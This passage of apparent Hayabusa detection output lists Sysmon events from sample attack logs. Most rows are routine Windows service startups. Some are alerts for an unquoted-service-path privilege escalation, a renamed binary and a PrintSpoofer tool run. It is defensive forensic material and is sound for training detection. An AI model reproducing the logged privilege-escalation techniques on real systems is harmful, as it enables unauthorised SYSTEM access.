SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1440 | PGUID: 747F3D96-B765-5EA4-0000-00107A380100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:27.198 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1552 | PGUID: 747F3D96-B765-5EA4-0000-00100B390100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:27.473 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 2076 | PGUID: 747F3D96-B765-5EA4-0000-0010AA430100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:27.481 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20200425_221917_750.etl | Process: C:\Windows\System32\svchost.exe | PID: 2056 | PGUID: 747F3D96-B765-5EA4-0000-00106B420100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:27.484 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2204 | PGUID: 
747F3D96-B765-5EA4-0000-0010344D0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:27.583 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2364 | PGUID: 747F3D96-B765-5EA4-0000-001016620100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:27.764 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 2408 | PGUID: 747F3D96-B766-5EA4-0000-0010C4680100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:27.836 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k NetSvcs -p -s iphlpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2476 | PGUID: 747F3D96-B766-5EA4-0000-0010366F0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:27.838 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 2488 | PGUID: 747F3D96-B766-5EA4-0000-001019700100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:27.855 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2496 | PGUID: 747F3D96-B766-5EA4-0000-001046700100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:27.970 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 2632 | PGUID: 747F3D96-B766-5EA4-0000-0010A4790100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:28.014 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k utcsvc -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2640 | PGUID: 747F3D96-B766-5EA4-0000-0010067A0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:28.063 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNoNetwork -p -s DPS | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 2704 | PGUID: 747F3D96-B766-5EA4-0000-0010DE7E0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:28.065 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2736 | PGUID: 747F3D96-B766-5EA4-0000-0010A7800100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:28.068 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s SstpSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 2772 | PGUID: 747F3D96-B766-5EA4-0000-001074830100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:28.079 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\wlms\wlms.exe | Process: C:\Windows\System32\wlms\wlms.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2848 | PGUID: 747F3D96-B766-5EA4-0000-0010D4880100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:28.080 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"PrivEsc - Potential Unquoted Service Exploit | Cmd: c:\Program Files\vulnsvc\mmm.exe | Process: C:\program.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2856 | PGUID: 747F3D96-B766-5EA4-0000-0010E7880100 | Hash: SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:28.080 +09:00,MSEDGEWIN10,1,medium,Evas,Renamed Binary,,rules/sigma/process_creation/proc_creation_win_renamed_binary.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:28.086 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2876 | PGUID: 747F3D96-B766-5EA4-0000-0010038A0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:28.096 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2900 | PGUID: 747F3D96-B766-5EA4-0000-00104A8D0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:28.465 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalService -p -s WdiServiceHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 3044 | PGUID: 747F3D96-B766-5EA4-0000-0010BAA10100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:32.050 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: sihost.exe | Process: C:\Windows\System32\sihost.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager | LID: 0x1d39b | PID: 3752 | PGUID: 747F3D96-B767-5EA4-0000-0010FE2E0200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:32.058 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc | Process: C:\Windows\System32\svchost.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x1d39b | PID: 3760 | PGUID: 747F3D96-B767-5EA4-0000-0010D0310200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:32.097 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService | Process: C:\Windows\System32\svchost.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x1d39b | PID: 3820 | PGUID: 747F3D96-B767-5EA4-0000-001097430200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:32.358 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 4264 | PGUID: 747F3D96-B768-5EA4-0000-00106FAE0200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:35.125 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\userinit.exe | Process: C:\Windows\System32\userinit.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: winlogon.exe | LID: 0x1d39b | PID: 4536 | PGUID: 747F3D96-B769-5EA4-0000-00101D9C0300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:35.236 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Explorer.EXE | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0x1d39b | PID: 4600 | PGUID: 747F3D96-B76A-5EA4-0000-0010EEB50300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:36.984 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:36.984 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\AC | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:36.984 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\AC\Temp | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:36.984 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\AC\INetCache | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:36.984 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\AC\INetHistory | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:36.984 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\AC\INetCookies | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:37.209 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc | LID: 0x1d39b | PID: 5840 | PGUID: 747F3D96-B76F-5EA4-0000-0010624D0600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:40.692 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 6964 | PGUID: 747F3D96-B776-5EA4-0000-0010A74D0B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:40.712 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe"" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications | Process: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\System32\RuntimeBroker.exe -Embedding | LID: 0x1d39b | PID: 7000 | PGUID: 747F3D96-B776-5EA4-0000-001006590B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:20:11.341 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d39b | PID: 6656 | PGUID: 747F3D96-B79B-5EA4-0000-00105BD50F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:20:11.402 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 6964 318 0000021FF2606500 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6648 | PGUID: 747F3D96-B79B-5EA4-0000-001075DA0F00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:20:11.516 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d36c | PID: 748 | PGUID: 747F3D96-B79B-5EA4-0000-001001FC0F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:20:16.073 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Discovery - domain time | Cmd: ""C:\BGinfo\BGINFO.EXE"" /accepteula /ic:\bginfo\bgconfig.bgi /timer:0 | Process: C:\BGinfo\BGINFO.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d39b | PID: 7056 | PGUID: 747F3D96-B7A0-5EA4-0000-001026D11000 | Hash: SHA1=1CEE3FA8419BDF4CBC266461277E3FDD9B93DE25,MD5=3652BA8B882BF6C69AF70CE73CF0D616,SHA256=0362CD6E7B318AB9A4C74DAF229F11BB795A2CE553EA024CB49143456C27C41D,IMPHASH=6EC19FF15BC88DDEDB96115003A96430",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:20:16.165 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\SecurityHealthService.exe | Process: C:\Windows\System32\SecurityHealthService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 7088 | PGUID: 747F3D96-B7A0-5EA4-0000-001027D81000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:20:16.965 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\19.232.1124.0012\FileCoAuth.exe -Embedding | Process: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\19.232.1124.0012\FileCoAuth.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | LID: 0x1d39b | PID: 3376 | PGUID: 747F3D96-B7A0-5EA4-0000-00108D131100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:20:18.975 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDrive.exe"" /background | Process: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDrive.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d39b | PID: 864 | PGUID: 747F3D96-B7A2-5EA4-0000-0010982F1200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:20:21.251 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\regedit.exe"" | Process: C:\Windows\regedit.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d39b | PID: 3256 | PGUID: 747F3D96-B7A5-5EA4-0000-0010CAB51300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:20:21.263 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 6964 258 0000021FF266EC20 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7036 | PGUID: 747F3D96-B7A5-5EA4-0000-0010EAB91300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:20:26.261 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\regedit.exe"" | Process: C:\Windows\regedit.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d36c | PID: 4480 | PGUID: 747F3D96-B7AA-5EA4-0000-001066001700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:21:08.564 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 2792 | PGUID: 747F3D96-B7D4-5EA4-0000-0010E09B1700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:21:18.412 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k NetworkService -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 6548 | PGUID: 747F3D96-B7DE-5EA4-0000-0010FA4E1800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:21:19.340 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k NetworkService -p -s WinRM | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 992 | PGUID: 747F3D96-B7DF-5EA4-0000-001052671800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:21:19.629 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1396 | PGUID: 747F3D96-B7DF-5EA4-0000-001080711800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-05-03 03:01:52.553 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe | PID: 7212 | PGUID: 747F3D96-B49D-5EAD-0000-001029FEBE00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
